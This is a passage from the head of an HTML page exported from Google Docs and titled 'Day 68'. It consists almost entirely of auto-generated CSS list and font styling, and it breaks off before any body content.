<html>

<head>
	<meta content="text/html; charset=UTF-8" http-equiv="content-type">
	<title>Day 68</title>
	<style type="text/css">
		@import url('https://themes.googleusercontent.com/fonts/css?kit=-lTUqgJg2dxbe4D7B5DEID164ctO4cAXGRkC_ZwBWlzm74GqoUREvGx3nvtIBwYUN4duVc9C58uwPiY8_59Fz51Zsjtnjtw1i9vMMjzZT74');

		.lst-kix_t8twi5tix7m3-4>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-4
		}

		.lst-kix_q172a0nf55p3-7>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-7
		}

		ol.lst-kix_fi2xbrv6fzbg-2.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-2 0
		}

		.lst-kix_n6wv8d8mqg4j-2>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-2
		}

		.lst-kix_2yzjaagjqxah-8>li:before {
			content: "\0025a0  "
		}

		ol.lst-kix_q172a0nf55p3-5.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-5 0
		}

		ol.lst-kix_avc0gcoxesrz-1.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-1 0
		}

		ol.lst-kix_n6wv8d8mqg4j-4.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-4 0
		}

		.lst-kix_5lp3gqbxm2h8-1>li:before {
			content: "\0025cb  "
		}

		.lst-kix_5lp3gqbxm2h8-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_n6wv8d8mqg4j-4>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-4
		}

		.lst-kix_5lp3gqbxm2h8-3>li:before {
			content: "\0025cf  "
		}

		.lst-kix_t8twi5tix7m3-2>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-2
		}

		.lst-kix_5lp3gqbxm2h8-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_5lp3gqbxm2h8-6>li:before {
			content: "\0025cf  "
		}

		ol.lst-kix_avc0gcoxesrz-7.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-7 0
		}

		.lst-kix_5lp3gqbxm2h8-5>li:before {
			content: "\0025a0  "
		}

		.lst-kix_5lp3gqbxm2h8-8>li:before {
			content: "\0025a0  "
		}

		.lst-kix_fi2xbrv6fzbg-7>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-7
		}

		.lst-kix_5lp3gqbxm2h8-7>li:before {
			content: "\0025cb  "
		}

		.lst-kix_avc0gcoxesrz-6>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-6
		}

		.lst-kix_t8twi5tix7m3-3>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-3, decimal) ". "
		}

		.lst-kix_kjisakvjzjsi-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_t8twi5tix7m3-4>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-4, lower-latin) ". "
		}

		.lst-kix_i6qpwdhuifir-8>li:before {
			content: "\0025a0  "
		}

		.lst-kix_fi2xbrv6fzbg-3>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-3
		}

		.lst-kix_t8twi5tix7m3-6>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-6, decimal) ". "
		}

		.lst-kix_kjisakvjzjsi-3>li:before {
			content: "\0025cf  "
		}

		.lst-kix_t8twi5tix7m3-5>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-5, lower-roman) ". "
		}

		.lst-kix_t8twi5tix7m3-7>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-7, lower-latin) ". "
		}

		.lst-kix_kjisakvjzjsi-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_kjisakvjzjsi-5>li:before {
			content: "\0025a0  "
		}

		.lst-kix_i6qpwdhuifir-3>li:before {
			content: "\0025cf  "
		}

		.lst-kix_kjisakvjzjsi-7>li:before {
			content: "\0025cb  "
		}

		.lst-kix_i6qpwdhuifir-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_kjisakvjzjsi-6>li:before {
			content: "\0025cf  "
		}

		.lst-kix_kjisakvjzjsi-8>li:before {
			content: "\0025a0  "
		}

		.lst-kix_i6qpwdhuifir-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_t8twi5tix7m3-8>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-8, lower-roman) ". "
		}

		.lst-kix_t8twi5tix7m3-6>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-6
		}

		.lst-kix_i6qpwdhuifir-1>li:before {
			content: "\0025cb  "
		}

		.lst-kix_t8twi5tix7m3-0>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-0
		}

		.lst-kix_avc0gcoxesrz-8>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-8
		}

		.lst-kix_q172a0nf55p3-0>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-0
		}

		.lst-kix_5lp3gqbxm2h8-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_q172a0nf55p3-3>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-3
		}

		ul.lst-kix_i6qpwdhuifir-0 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-2 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-1 {
			list-style-type: none
		}

		.lst-kix_avc0gcoxesrz-2>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-2
		}

		ul.lst-kix_i6qpwdhuifir-4 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-3 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-6 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-4.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-4 0
		}

		ol.lst-kix_avc0gcoxesrz-8.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-8 0
		}

		ul.lst-kix_i6qpwdhuifir-5 {
			list-style-type: none
		}

		ol.lst-kix_avc0gcoxesrz-2.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-2 0
		}

		ul.lst-kix_i6qpwdhuifir-8 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-7 {
			list-style-type: none
		}

		.lst-kix_i6qpwdhuifir-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_i6qpwdhuifir-5>li:before {
			content: "\0025a0  "
		}

		.lst-kix_i6qpwdhuifir-6>li:before {
			content: "\0025cf  "
		}

		ol.lst-kix_n6wv8d8mqg4j-5.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-5 0
		}

		.lst-kix_kjisakvjzjsi-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_kjisakvjzjsi-1>li:before {
			content: "\0025cb  "
		}

		.lst-kix_i6qpwdhuifir-7>li:before {
			content: "\0025cb  "
		}

		ul.lst-kix_2yzjaagjqxah-0 {
			list-style-type: none
		}

		.lst-kix_lh5aqr9xz8oa-2>li:before {
			content: "\0025a0  "
		}

		ul.lst-kix_kjisakvjzjsi-8 {
			list-style-type: none
		}

		.lst-kix_fi2xbrv6fzbg-0>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-0
		}

		ul.lst-kix_kjisakvjzjsi-5 {
			list-style-type: none
		}

		.lst-kix_n6wv8d8mqg4j-8>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-8
		}

		ul.lst-kix_kjisakvjzjsi-4 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-7 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-6 {
			list-style-type: none
		}

		ol.lst-kix_n6wv8d8mqg4j-5 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-7 {
			list-style-type: none
		}

		ol.lst-kix_n6wv8d8mqg4j-6 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-8 {
			list-style-type: none
		}

		ol.lst-kix_n6wv8d8mqg4j-3 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-5 {
			list-style-type: none
		}

		ol.lst-kix_n6wv8d8mqg4j-4 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-6 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-3 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-4 {
			list-style-type: none
		}

		.lst-kix_lh5aqr9xz8oa-0>li:before {
			content: "  "
		}

		.lst-kix_lh5aqr9xz8oa-8>li:before {
			content: "\0025a0  "
		}

		ol.lst-kix_n6wv8d8mqg4j-7 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-1 {
			list-style-type: none
		}

		ol.lst-kix_n6wv8d8mqg4j-8 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-2 {
			list-style-type: none
		}

		.lst-kix_n6wv8d8mqg4j-2>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-2, lower-roman) ". "
		}

		.lst-kix_q172a0nf55p3-2>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-2
		}

		ol.lst-kix_n6wv8d8mqg4j-1 {
			list-style-type: none
		}

		.lst-kix_n6wv8d8mqg4j-0>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-0, decimal) ". "
		}

		ol.lst-kix_n6wv8d8mqg4j-2 {
			list-style-type: none
		}

		.lst-kix_n6wv8d8mqg4j-4>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-4, lower-latin) ". "
		}

		ol.lst-kix_n6wv8d8mqg4j-0 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-1 {
			list-style-type: none
		}

		.lst-kix_avc0gcoxesrz-1>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-1
		}

		.lst-kix_lh5aqr9xz8oa-6>li:before {
			content: "\0025cf  "
		}

		ul.lst-kix_kjisakvjzjsi-0 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-3 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-2 {
			list-style-type: none
		}

		.lst-kix_lh5aqr9xz8oa-4>li:before {
			content: "\0025cb  "
		}

		ol.lst-kix_fi2xbrv6fzbg-6.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-6 0
		}

		.lst-kix_avc0gcoxesrz-5>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-5, lower-roman) ". "
		}

		.lst-kix_avc0gcoxesrz-7>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-7, lower-latin) ". "
		}

		.lst-kix_n6wv8d8mqg4j-8>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-8, lower-roman) ". "
		}

		.lst-kix_n6wv8d8mqg4j-6>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-6, decimal) ". "
		}

		.lst-kix_avc0gcoxesrz-1>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-1, lower-latin) ". "
		}

		ol.lst-kix_avc0gcoxesrz-3.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-3 0
		}

		.lst-kix_avc0gcoxesrz-0>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-0
		}

		ol.lst-kix_t8twi5tix7m3-1 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-0 {
			list-style-type: none
		}

		ol.lst-kix_n6wv8d8mqg4j-3.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-3 0
		}

		ol.lst-kix_t8twi5tix7m3-7 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-6 {
			list-style-type: none
		}

		.lst-kix_t8twi5tix7m3-8>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-8
		}

		ol.lst-kix_t8twi5tix7m3-8.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-8 0
		}

		.lst-kix_avc0gcoxesrz-3>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-3, decimal) ". "
		}

		ol.lst-kix_t8twi5tix7m3-8 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-3 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-2 {
			list-style-type: none
		}

		ol.lst-kix_n6wv8d8mqg4j-0.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-0 0
		}

		ol.lst-kix_t8twi5tix7m3-5 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-4 {
			list-style-type: none
		}

		.lst-kix_q172a0nf55p3-1>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-1
		}

		.lst-kix_t8twi5tix7m3-1>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-1
		}

		.lst-kix_t8twi5tix7m3-1>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-1, lower-latin) ". "
		}

		ol.lst-kix_avc0gcoxesrz-6.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-6 0
		}

		ol.lst-kix_fi2xbrv6fzbg-7.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-7 0
		}

		.lst-kix_t8twi5tix7m3-7>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-7
		}

		ol.lst-kix_n6wv8d8mqg4j-2.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-2 0
		}

		ol.lst-kix_q172a0nf55p3-0.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-0 0
		}

		ol.lst-kix_q172a0nf55p3-1.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-1 0
		}

		ol.lst-kix_n6wv8d8mqg4j-1.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-1 0
		}

		.lst-kix_2yzjaagjqxah-7>li:before {
			content: "\0025cb  "
		}

		.lst-kix_fi2xbrv6fzbg-5>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-5
		}

		.lst-kix_2yzjaagjqxah-5>li:before {
			content: "\0025a0  "
		}

		.lst-kix_n6wv8d8mqg4j-3>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-3
		}

		.lst-kix_q172a0nf55p3-8>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-8
		}

		ol.lst-kix_fi2xbrv6fzbg-8.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-8 0
		}

		.lst-kix_2yzjaagjqxah-3>li:before {
			content: "\0025cf  "
		}

		.lst-kix_2yzjaagjqxah-1>li:before {
			content: "\0025cb  "
		}

		ol.lst-kix_avc0gcoxesrz-5.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-5 0
		}

		.lst-kix_fi2xbrv6fzbg-6>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-6
		}

		ol.lst-kix_n6wv8d8mqg4j-7.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-7 0
		}

		ol.lst-kix_avc0gcoxesrz-4.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-4 0
		}

		.lst-kix_q172a0nf55p3-8>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-8, lower-roman) ". "
		}

		.lst-kix_avc0gcoxesrz-7>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-7
		}

		ol.lst-kix_q172a0nf55p3-2.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-2 0
		}

		.lst-kix_q172a0nf55p3-7>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-7, lower-latin) ". "
		}

		.lst-kix_q172a0nf55p3-4>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-4, lower-latin) ". "
		}

		.lst-kix_q172a0nf55p3-5>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-5, lower-roman) ". "
		}

		.lst-kix_q172a0nf55p3-2>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-2, lower-roman) ". "
		}

		.lst-kix_q172a0nf55p3-6>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-6, decimal) ". "
		}

		ol.lst-kix_t8twi5tix7m3-1.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-1 0
		}

		.lst-kix_q172a0nf55p3-6>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-6
		}

		.lst-kix_t8twi5tix7m3-3>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-3
		}

		.lst-kix_q172a0nf55p3-3>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-3, decimal) ". "
		}

		.lst-kix_fi2xbrv6fzbg-3>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-3, decimal) ". "
		}

		.lst-kix_n6wv8d8mqg4j-1>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-1
		}

		.lst-kix_fi2xbrv6fzbg-2>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-2, lower-roman) ". "
		}

		.lst-kix_fi2xbrv6fzbg-6>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-6, decimal) ". "
		}

		ul.lst-kix_hkg89eyxvtvi-0 {
			list-style-type: none
		}

		.lst-kix_q172a0nf55p3-0>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-0, decimal) ". "
		}

		.lst-kix_q172a0nf55p3-1>li:before {
			content: ""counter(lst-ctn-kix_q172a0nf55p3-1, lower-latin) ". "
		}

		.lst-kix_fi2xbrv6fzbg-5>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-5, lower-roman) ". "
		}

		.lst-kix_fi2xbrv6fzbg-4>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-4, lower-latin) ". "
		}

		.lst-kix_fi2xbrv6fzbg-4>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-4
		}

		ul.lst-kix_hkg89eyxvtvi-1 {
			list-style-type: none
		}

		.lst-kix_fi2xbrv6fzbg-7>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-7, lower-latin) ". "
		}

		ul.lst-kix_hkg89eyxvtvi-2 {
			list-style-type: none
		}

		.lst-kix_t8twi5tix7m3-5>li {
			counter-increment: lst-ctn-kix_t8twi5tix7m3-5
		}

		ul.lst-kix_hkg89eyxvtvi-3 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-4 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-5 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-6 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-7 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-8 {
			list-style-type: none
		}

		.lst-kix_fi2xbrv6fzbg-8>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-8, lower-roman) ". "
		}

		ol.lst-kix_fi2xbrv6fzbg-0.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-0 0
		}

		ol.lst-kix_t8twi5tix7m3-7.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-7 0
		}

		ol.lst-kix_q172a0nf55p3-3.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-3 0
		}

		.lst-kix_n6wv8d8mqg4j-5>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-5
		}

		ol.lst-kix_fi2xbrv6fzbg-4.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-4 0
		}

		.lst-kix_fi2xbrv6fzbg-1>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-1, lower-latin) ". "
		}

		.lst-kix_hkg89eyxvtvi-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_fi2xbrv6fzbg-0>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-0, decimal) ". "
		}

		.lst-kix_hkg89eyxvtvi-1>li:before {
			content: "\0025cb  "
		}

		.lst-kix_avc0gcoxesrz-5>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-5
		}

		.lst-kix_hkg89eyxvtvi-3>li:before {
			content: "\0025cf  "
		}

		ul.lst-kix_5lp3gqbxm2h8-1 {
			list-style-type: none
		}

		ul.lst-kix_5lp3gqbxm2h8-0 {
			list-style-type: none
		}

		.lst-kix_hkg89eyxvtvi-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_hkg89eyxvtvi-5>li:before {
			content: "\0025a0  "
		}

		ol.lst-kix_t8twi5tix7m3-6.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-6 0
		}

		.lst-kix_hkg89eyxvtvi-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_hkg89eyxvtvi-7>li:before {
			content: "\0025cb  "
		}

		.lst-kix_hkg89eyxvtvi-6>li:before {
			content: "\0025cf  "
		}

		ul.lst-kix_5lp3gqbxm2h8-5 {
			list-style-type: none
		}

		ul.lst-kix_5lp3gqbxm2h8-4 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-5.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-5 0
		}

		ul.lst-kix_5lp3gqbxm2h8-3 {
			list-style-type: none
		}

		ul.lst-kix_5lp3gqbxm2h8-2 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-0.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-0 0
		}

		ul.lst-kix_5lp3gqbxm2h8-8 {
			list-style-type: none
		}

		.lst-kix_hkg89eyxvtvi-8>li:before {
			content: "\0025a0  "
		}

		ul.lst-kix_5lp3gqbxm2h8-7 {
			list-style-type: none
		}

		ul.lst-kix_5lp3gqbxm2h8-6 {
			list-style-type: none
		}

		.lst-kix_lh5aqr9xz8oa-1>li:before {
			content: "\0025cb  "
		}

		.lst-kix_lh5aqr9xz8oa-3>li:before {
			content: "\0025cf  "
		}

		ol.lst-kix_fi2xbrv6fzbg-3 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-4 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-1 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-2 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-0 {
			list-style-type: none
		}

		.lst-kix_n6wv8d8mqg4j-1>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-1, lower-latin) ". "
		}

		ul.lst-kix_lh5aqr9xz8oa-0 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-7 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-8 {
			list-style-type: none
		}

		.lst-kix_lh5aqr9xz8oa-7>li:before {
			content: "\0025cb  "
		}

		ol.lst-kix_fi2xbrv6fzbg-5 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-6 {
			list-style-type: none
		}

		ul.lst-kix_lh5aqr9xz8oa-7 {
			list-style-type: none
		}

		.lst-kix_lh5aqr9xz8oa-5>li:before {
			content: "\0025a0  "
		}

		ul.lst-kix_lh5aqr9xz8oa-8 {
			list-style-type: none
		}

		ul.lst-kix_lh5aqr9xz8oa-5 {
			list-style-type: none
		}

		ul.lst-kix_lh5aqr9xz8oa-6 {
			list-style-type: none
		}

		ul.lst-kix_lh5aqr9xz8oa-3 {
			list-style-type: none
		}

		.lst-kix_n6wv8d8mqg4j-3>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-3, decimal) ". "
		}

		ul.lst-kix_lh5aqr9xz8oa-4 {
			list-style-type: none
		}

		ul.lst-kix_lh5aqr9xz8oa-1 {
			list-style-type: none
		}

		ul.lst-kix_lh5aqr9xz8oa-2 {
			list-style-type: none
		}

		ol.lst-kix_avc0gcoxesrz-0 {
			list-style-type: none
		}

		.lst-kix_avc0gcoxesrz-6>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-6, decimal) ". "
		}

		ol.lst-kix_avc0gcoxesrz-1 {
			list-style-type: none
		}

		ol.lst-kix_n6wv8d8mqg4j-6.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-6 0
		}

		.lst-kix_avc0gcoxesrz-2>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-2, lower-roman) ". "
		}

		ol.lst-kix_avc0gcoxesrz-8 {
			list-style-type: none
		}

		.lst-kix_n6wv8d8mqg4j-5>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-5, lower-roman) ". "
		}

		ol.lst-kix_q172a0nf55p3-6.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-6 0
		}

		ol.lst-kix_avc0gcoxesrz-6 {
			list-style-type: none
		}

		ol.lst-kix_avc0gcoxesrz-7 {
			list-style-type: none
		}

		.lst-kix_avc0gcoxesrz-0>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-0, decimal) ". "
		}

		ol.lst-kix_avc0gcoxesrz-4 {
			list-style-type: none
		}

		.lst-kix_avc0gcoxesrz-8>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-8, lower-roman) ". "
		}

		.lst-kix_n6wv8d8mqg4j-7>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-7, lower-latin) ". "
		}

		ol.lst-kix_avc0gcoxesrz-5 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-2.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-2 0
		}

		ol.lst-kix_avc0gcoxesrz-2 {
			list-style-type: none
		}

		ol.lst-kix_avc0gcoxesrz-3 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-3.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-3 0
		}

		.lst-kix_avc0gcoxesrz-3>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-3
		}

		.lst-kix_n6wv8d8mqg4j-7>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-7
		}

		ol.lst-kix_t8twi5tix7m3-5.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-5 0
		}

		ol.lst-kix_avc0gcoxesrz-0.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-0 0
		}

		.lst-kix_q172a0nf55p3-4>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-4
		}

		.lst-kix_avc0gcoxesrz-4>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-4, lower-latin) ". "
		}

		.lst-kix_fi2xbrv6fzbg-1>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-1
		}

		.lst-kix_t8twi5tix7m3-2>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-2, lower-roman) ". "
		}

		ol.lst-kix_q172a0nf55p3-5 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-4 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-7.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-7 0
		}

		ol.lst-kix_q172a0nf55p3-3 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-2 {
			list-style-type: none
		}

		.lst-kix_t8twi5tix7m3-0>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-0, decimal) ". "
		}

		ol.lst-kix_t8twi5tix7m3-3.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-3 0
		}

		ol.lst-kix_q172a0nf55p3-8 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-7 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-6 {
			list-style-type: none
		}

		.lst-kix_n6wv8d8mqg4j-6>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-6
		}

		.lst-kix_avc0gcoxesrz-4>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-4
		}

		ol.lst-kix_t8twi5tix7m3-4.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-4 0
		}

		ol.lst-kix_q172a0nf55p3-8.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-8 0
		}

		ol.lst-kix_fi2xbrv6fzbg-1.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-1 0
		}

		.lst-kix_fi2xbrv6fzbg-2>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-2
		}

		.lst-kix_2yzjaagjqxah-6>li:before {
			content: "\0025cf  "
		}

		.lst-kix_q172a0nf55p3-5>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-5
		}

		.lst-kix_2yzjaagjqxah-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_2yzjaagjqxah-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_fi2xbrv6fzbg-8>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-8
		}

		.lst-kix_n6wv8d8mqg4j-0>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-0
		}

		ol.lst-kix_n6wv8d8mqg4j-8.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-8 0
		}

		.lst-kix_2yzjaagjqxah-0>li:before {
			content: "\0025cf  "
		}

		ol.lst-kix_q172a0nf55p3-1 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-0 {
			list-style-type: none
		}

		ol {
			margin: 0;
			padding: 0
		}

		table td,
		table th {
			padding: 0
		}

		.c1 {
			color: #000000;
			font-weight: 300;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 14pt;
			font-family: "Roboto Mono";
			font-style: normal
		}

		.c6 {
			-webkit-text-decoration-skip: none;
			color: #1155cc;
			font-weight: 400;
			text-decoration: underline;
			text-decoration-skip-ink: none;
			font-size: 14pt;
			font-family: "Montserrat"
		}

